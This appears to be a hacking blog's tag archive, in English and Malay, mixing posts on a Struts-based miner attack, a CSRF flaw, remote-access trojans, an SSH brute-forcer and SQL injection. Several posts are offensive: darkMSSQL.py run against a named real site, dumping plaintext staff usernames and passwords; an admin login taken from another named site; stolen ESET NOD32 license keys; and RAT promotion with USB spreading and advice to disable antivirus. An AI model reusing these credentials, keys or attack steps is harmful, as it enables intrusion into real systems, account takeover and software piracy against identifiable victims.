Tag Archives: hack

Shell hiding in image files

One day, we noticed strange GET request towards our JBoss server:

From the request above, you’ll quickly noticed that this attack leveraging Apache Struts vulnerability from CVE-2017-5638.

The request tried to execute command below:

“-O” : writes the documents to file.
“-” : if is used as file, documents will be printed to standard output, disabling link conversion.
“-q” : quiet (no output)

As you see, it tried to fetch image (jpeg file) from 91.230.47.41. Seems normal right?
We fetch the file & take a look at the jpg file:

ASCII?? Not JPEG?? hmm..
Here’s whats inside the “logo.jpg” file:

We noticed there are several other file fetched; possibly a config file & bin file.
Let’s fetch those file!

Here is the config file:
http://91.230.47.41/pics/kworker.conf

Not sure it is. Maybe bin file to run a process:
http://91.230.47.41/pics/kworker

Lets see if the file is packed:

Yup. So lets unpacked the file using UPX:

http://91.230.47.41/pics/kworker_na

Overall, looks like the attacker want to hack our servers & turn it into his own crypto currency mining machine.
Typical behavior of attack we see in this time where the crypto currency is rising. People hack to make profit. 🙂

Here the MD5 for file above:

VNCViewer for Metasploit payload on Mac OS X

When working with VNC payloads, the Metasploit framework need vncviwer to be installed on the machine. Since Apple includes a VNC Client by default with OSX lets create a simple bash script that will call on the hos:ip combination that Metasploit uses with vncviwer so we do not have to fight with XQuatz and X11 to get one running on OSX:

echo '#!/usr/bin/env bash' >> /usr/local/bin/vncviewer
echo open vnc://\$1 >> /usr/local/bin/vncviewer
chmod +x /usr/local/bin/vncviewer

This will allow us to call from the terminal a connection to a VNC Server like:

vncviewer 192.168.1.120:5901

How to SSH bruteforce on Linux/Mac OS X

SSH is an acronym for Secure Socket sHell, which provides a secure connection access to a remote machine.

By using this SSH Bruteforce tool, you can test security stuff like iptables, sshguard or fail2ban to see whether the rules or policy that have been set working or not. You also able to see the procedure of real hacking attempt.

Like most of brute forcing tools, first you’ll need a big passlist. You can get one from here:

Get SSHBrute python script:

To get it to work you will need this packages:

For Mac OS X user, this is the requirement:

  • Xcode 4.3 (App Store link) or later installed including Command Line Tools or install GCC and Command Line Tools without Xcode
  • Get Paramiko 1.7.7.2+ (or whatever the newest version is), this package includes PyCrypto

Download Paramiko at here:

Then, unzip the Paramiko archive and go to that directory:

Type the following command to start installing:

After that, unzip SSHBrute:

Go to SSHBrute directory:

To start the script, run this command:

The parameter:
-h = hostname/IP address
-u = username/username list
-d = password list

This is how the tool works:

SQLI – buyamotor[dot]com[dot]my

Almost a decade ago I left this things..

Target:              http://www.buyamotor.com.my/motor.php?cat=53
Host IP:            42.1.60.81
Current DB:     buyamoto_buym
Data Bases:      information_schema
                         buyamoto_buym

Data Found:
admin_email | admin_id | admin_user | admin_pwd
[email protected] | 1 | admin | adminpassword

But luckily I didn’t manage to find the admin page.. 🙁 

CSRF in SpiceFuse Shoutbox (MyBB)

bagi sape2 yg ade forum yg berasaskan MyBB, dan yg menggunakan SpiceFuse Shoutbox, baik korg baca bnd ni..
sbb ade bnd yg menarik kat sini.. 🙂
bnd ni Johnburn dr tbd.my yg jmp.. jd aku share kn kat sini..
special thanx to Johnburn utk artikel & solution ni.. 🙂

The stories:
Tadi xda keje aku tgk2 code mybb dengan target nk bypass xss filter mybb melalui bbcode dia. dlm aku tgk2 tu aku nmpk satu bnda yg agak menarik pada code shoutbox (aku install plugin SpiceFuse Shoutbox yg sama mcm kt TBD and my0d). Plugin ni vulnerable kepada CSRF melalui image tag.

PoC:
Jika user post yang berikut kat shoutbox, mana2 user len yg view shoutbox secara automatik akan turut post sebarang post jika browser diset untuk load image (default).

http://www.tbd.my/v2/xmlhttp.php?action=add_shout&shout_data=sebarangPost

Quick Fix:
Bleh elak dengan menggunakan token pada shoutbox. Untuk tmbah token, bleh ikut yg berikut:

Edit file ni:

cari line berikut:

dan gantikan dengan line ni:

Edit file ni:

cari line:

tambah line berikut selpas code di atas:

cari line berikut:

dan gantikan dengan line ni:

Edit file ni:

cari line berikut:

tambah code berikut selepas baris code di atas:

p/s: mungkin perlu reactivate blk shoutbox supaya apa yg diubah pada template untuk take effect.

Remote Administrator Tools a.k.a. RAT

RAT ni mungkin ade yang baru tau,
dan ade jugak yang da lama tau pasal tool ni (org lama/otai)..
So, kat sini aku listkan beberapa tool favourite aku.. 😀

1. Cybergate
p/s: klik kat gambo tu klu nk beso kn..

Dihasilkan oleh Cyber-Sec, ini merupakan tool yang aku suka guna..
Ramai hackers guna tools ni..
Tapi pengeluarannya dah terhad..

Sampai version 1.03.0-Public Version je kot..
Lepas ni klu nak version yang latest, kene beli.. 🙁

Tapi anda masih boleh lagi dapatkan tool ni untuk version yang lama..

2. Spy-Net
p/s: klik kat gambo tu klu nk beso kn..

Ni pun antara tool RAT yang hebat jugak..
Dengan fungsi nya yang best, iaitu USB Spreader, anda boleh sebarkan ‘tikus’ tanpa susah2.. 😀
USB Spreader ni bermaksud, bila ada 1 PC yang da terkene ‘tikus’ anda tu dicucuk pendrive, pendrive tu la yang akan sebarkan ‘tikus’ anda tu secara automatik..
x payah susah2 nk tunggu orang donlod ‘tikus’ anda.. 🙂
Best kn?

Tapi tool ni da di berhentikn production nye atas sebab yang x di ketahui..
Last version yang di keluar kn, version 2.7..
Anda boleh dapatkan nye kat sini; Spy-Net

Ade lagi sebenar nye tool RAT ni..
Antaranya:
Cerberus
– Dark-Comet
– Apocalypse
Turkojan
Deeper

Link aku x mo bg sebab nnt korang cakap aku da letak ‘tikus’ dlm tu.. 😀
Jadi, pandai2 la google sendiri untuk maklumat lanjut & link utk donlod eh.. 🙂

p/s : ni dikategorikan sebagai hacking tool. So sudi2 kan la mati kan AV korg tu eh kalau nk gune..

Zeus Trojan ditemui sebanyak 74k pada PC pengguna global.

zeuspanel12

Lebih dari 74k PC di hampir 2500 organisasi di seluruh dunia sudah terganggu selama satu setengah tahun akibat jangkitan botnet yang direka untuk mencuri rahsia2 di pangkalan data tersebut dengan masuki ke laman bank, rangkaian sosial, dan sistem e-mel.

Sistem tersebut dijangkiti dengan Trojan Zeus dan botnet yang diberi nama jolokan “Kneber” selepas PC pengguna yang dijangkiti Trojan ini di hubungkan pada syarikat dan sistem kerajaan, mengikut kajian NetWitness.

The Wall Street Journal melaporkan bahawa Merck, Kardinal Health, Paramount Pictures, dan Juniper Networks adalah di antara sasaran dalam serangan itu. NetWitness berspekulasi bahawa penjahat di Eropah Timur dengan menggunakan arahan-dan-kawalan pelayan di German dihantar melalui lampiran yang mengandungi malware dalam e-mel atau link ke malware pada halaman-halaman Web dan diklik oleh pekerja dalam syarikat tersebut tanpa menyedarinya.


NetWitness mengatakan pihak mereka telah menemui lebih daripada 75 gb data-data bernilai yang dicuri semasa mereka melakukan tugas-tugas rutin mereka sebagai sebahagian daripada evaluasi rangkaian klien pada tarikh 26 Januari. Cache data yang dicuri merangkumi login syarikat identitinya sebanyak 68k, akses kepada sistem e-mel, laman perbankan online, Facebook, Yahoo, Hotmail, 2k file SSL (Secure Socket Layer) dan data-data pada individu yang dijangkiti.

Selain mencuri data tertentu, Zeus boleh digunakan untuk mencari dan mencuri file apa saja di komputer, download dan menjalankan program dan membolehkan seseorang itu untuk mengendalikan komputer dari jarak jauh.

Lebih daripada separuh daripada enjin dikompromikan juga dijangkiti dengan peer-to-peer(p2p) malware bot yang dikenali sebagai Waledac, kata syarikat itu. Hampir 200 negara yang terkena jangkitan ini, dan sebahagian besar jangkitan ditemui di Mesir, Mexico, Arab Saudi, Turki dan Amerika Syarikat.

Berita itu datang selepas Google mengumumkan sasaran serangan itu dan apa yang diyakini akan lebih daripada 30 syarikat lain yang berkaitan dan kembali ke China. McAfee memberi nama serangan ini; “Operasi Aurora”.

“Sementara Operasi Aurora menjelaskan ancaman lanjutan, jumlah syarikat dan pertubuhan yang dikompromikan semakin meningkat jika dibandingkan dengan botnet tunggal ini,” kata Amit Yoran, Chief Executive NetWitness dan Pengarah Bahagian Keselamatan Cyber Nasional. “Ini kompromi skala besar untuk rangkaian syarikat yang telah mencapai tahap penularan yang merbahaya.”

ESET Nod32 Taiwan pwn! :)

Today, another Nod32 website has been pwnd/hacked..

Here is the screenshot :

ESET NOD32 Taiwan

So, in this peaceful day, i have something give for you all.. 🙂

new_key=J112-mgf7f4r8u   org_key=J102-e4rdefyr5
new_key=J112-r6w87jwy2   org_key=J102-e5xzgsrfw
new_key=J112-spgbw2j5w   org_key=J102-e7tj8p3ww
new_key=J112-p94sfm3yt   org_key=J102-e83dteggq
new_key=J112-tm6v4yttt   org_key=J102-e9wwn8h4f
new_key=J112-uwwqk7vjy   org_key=J102-eax58prwg
new_key=J112-syw3wr7wp   org_key=J102-eb5c58mkj
new_key=J112-e4u6emunx   org_key=J102-ebcekvqed
new_key=J112-tsaudq3cy   org_key=J102-ecnf7u3ue
new_key=J112-ycbmr376x   org_key=J102-ecnhq856w

Brand new NOD32 key.. ahaha..

This thing really annoying me..

Why?

Because their website security is really low..

They dont manage their db very well..

I just wondering why they put important files like serial key, password, username, and others important files in their database without encrypting it..

Like some of the db that i found, mostly they dont encrypt their password..

Sound bad to me.. 🙂

Anyway, see you next time!

Assalamualaikum.. 🙂

Heraldonline.com & Mahkamah.gov.my pwnd!

1st topic.

This website has been hacked on 4th of January 2010, two days after a High Court decision allowing Catholics to use “Allah” to describe the Christian God in the national language. WTF!?

For more stories about what is happening, just go to Herald Malaysia and read out the stories inside.. 🙂

2nd topic.

This is another website that have been hacked on 7th of January 2010, just 3 days after the Herald Malaysia been pawned.

Just my opinion, I think this action is because court’s decision that allow The Herald to use the word ‘Allah’ in its publication.

More news in here and here.

Huh! What a long journey for the 1st week of 2010..

Baru masuk tahun baru, dah macam-macam kes berlaku..

Macam-macam hal la..

p/s : Kepada pembaca sekalian, saya harap anda dapat nilai apa isi tersirat yang sebenarnya saya ingin sampaikan dalam artikel ini..

darkMSSQL tutorial

Hari ini aku nak tunjukkan macam mana cara menggunakan darkMSSQL.py…

benda ni digunakan untuk MSSQL database yang ade error..
Aku jarang jumpa database MSSQL yang ada error..
Kalau jumpa pun, nasib2 je..

Tu agaknya pemalas sangat la tu Web Admin dia..
Server GMi pun pakai server jenis MSSQL jgk..
Oppss! Sori! :p

Apa2 pun, jom kita tengok macam mana aku gunakan darkMSSQL.py ni..

darkMSSQL.py journey… begin…


-h command (help)
Usage: ./darkMSSQL.py [options]                       rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --info    Gets MySQL server configuration only.
Define: --dbs     Shows all databases user has access too.
Define: --schema  Enumerate Information_schema Database.
Define: --dump    Extract information from a Database, Table and Column.
Define: --insert  Insert data into specified db, table and column(s).

Required:
Define: -u        URL "www.site.com/news.asp?id=2" or "www.site.com/index.asp?id=news'"

Mode dump and schema options:
Define: -D        "database_name"
Define: -T        "table_name"
Define: -C        "column_name,column_name..."

Optional:
Define: -p        "127.0.0.1:80 or proxy.txt"
Define: -o        "ouput_file_name.txt"        Default is darkMSSQLlog.txt
Define: -r        "-r 20" this will make the script resume at row 20 during dumping
Define: --cookie  "cookie_file.txt"
Define: --debug   Prints debug info to terminal.

Ex: ./darkMSSQL.py --info -u "www.site.com/news.asp?id=2"
Ex: ./darkMSSQL.py --dbs -u "www.site.com/news.asp?id=2"
Ex: ./darkMSSQL.py --schema -u "www.site.com/news.asp?id=2" -D dbname
Ex: ./darkMSSQL.py --dump -u "www.site.com/news.asp?id=2" -D dbname -T tablename -C username,password
Ex: ./darkMSSQL.py -u "www.site.com/news.asp?news=article'" -D dbname -T table -C user,pass --insert -D dbname -T table -C darkuser,darkpass

[email protected]:~/Desktop$ python darkMSSQL.py --info -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:25
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying information about MSSQL host!

[+] @@VERSION: Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
May  3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

[+] USER: mylittletail_usr
[+] DB_NAME(): mylittletail_db
[+] HOST_NAME(): SERVER439

[+] Script detected Microsoft SQL Version:  2000
[+] Checking to see if we can view password hashs... Nope!

[-] [00:19:26]
[-] Total URL Requests 5
[-] Done

Don't forget to check darkMSSQLlog.txt

[email protected]:~/Desktop$ python darkMSSQL.py --dbs -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL: http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:39
[+] Cookie: None
[-] Proxy Not Given
[+] Displaying list of all databases on MSSQL host!

[0] mylittletail_db
[1] master
[2] tempdb
[3] model
[4] msdb
[5] pubs
[6] Northwind
[7] lotteryuk_db
[8] mylittletail_db
[9] sailor_db

[-] 00:19:41
[-] Total URL Requests 11
[-] Done

Don't forget to check darkMSSQLlog.txt

[email protected]:~/Desktop$ python darkMSSQL.py --schema -D mylittletail_db -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:31:03
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying tables inside DB: mylittletail_db

[0] addon
[1] category
[2] country
[3] delivery
[4] discount
[5] dtproperties
[6] featured_category
[7] featured_item
[8] featured_maincategory
[9] item_packages
[10] item_questions
[11] items
[12] items_addon
[13] items_also
[14] main_items
[15] member
[16] message
[17] millkak
[18] newsletter_counter
[19] newsletter_log
[20] newsletter_master
[21] order
[22] order_item
[23] subcategory
[24] sysconstraints
[25] syssegments
[26] t_jiaozhu
[27] temp_order
[28] temp_order_id
[29] ticketing
[30] uploadform
[31] userlog
[32] users

[-] [00:31:09]
[-] Total URL Requests 34
[-] Done

Don't forget to check darkMSSQLlog.txt

[email protected]:~/Desktop$ python darkMSSQL.py --dump -D mylittletail_db -T users -C username,password -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:27:52
[+] Cookie: None
[+] Proxy Not Given
[0] 20admin08:72hu1ge9 admin
[1] yennee08:01yen04nee admin
[2] jolen18e:dedica18 staff
[3] jason:11jas37on5 admin
[4] katrina03:031983 staff
[5] zack09:20gift09 staff
[6] 3sales69:3moneytail69 staff

[-] [00:27:54]
[-] Total URL Requests 8
[-] Done

Don't forget to check darkMSSQLlog.txt

korang paham x bnd ni?

klu x paham, bole tny aku..

bukannya susah sgt pn.. 😀

p/s : thanks to rsauron from darkc0de for this script.. nice one mate ! 🙂